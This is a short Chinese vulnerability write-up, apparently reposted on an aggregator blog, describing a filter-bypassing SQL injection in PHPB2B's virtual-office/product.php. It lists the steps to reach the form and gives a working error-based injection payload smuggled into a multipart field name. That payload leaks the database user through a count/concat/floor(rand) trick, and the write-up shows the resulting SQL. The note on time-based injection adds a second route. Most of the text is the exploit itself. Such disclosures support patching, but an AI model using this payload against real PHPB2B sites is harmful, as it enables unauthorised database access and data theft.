php3绕过,PHPB2B注入#3(绕过过滤)
PHPB2B某處注入
繞過過濾。
官方最新版本. https://github.com/ulinke/phpb2b/archive/master.zip
詳細說明:
1.注冊企業會員。
2.注冊企業會員且通過審核。
發布產品。
漏洞文件。virtual-office/product.php
Content-Disposition: form-data; name="data[product][sort_id]"
Content-Disposition: form-data; name="data[product][name]"
...
...
post提交:Content-Disposition: form-data; name="data[product][sort_id FROM pb_thk_products where 1=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)#]"
執行:
SELECT sort_id FROM pb_thk_products where 1=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)#,name,price,country_id,content,type_id,category_id,brand_id,status,tag_ids,cache_companyname,industry_id,area_id,member_id,company_id,modified,created FROM pb_thk_products WHERE id='-1'
漏洞證明:
本地測試開啟debug。程序默認不開啟debug,可延時注入。
總結
以上是生活随笔為你收集整理的php3绕过,PHPB2B注入#3(绕过过滤)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 现代软件工程 作业 结对编程 模板
- 下一篇: 清华大学 lt;现代软件工程gt; 项目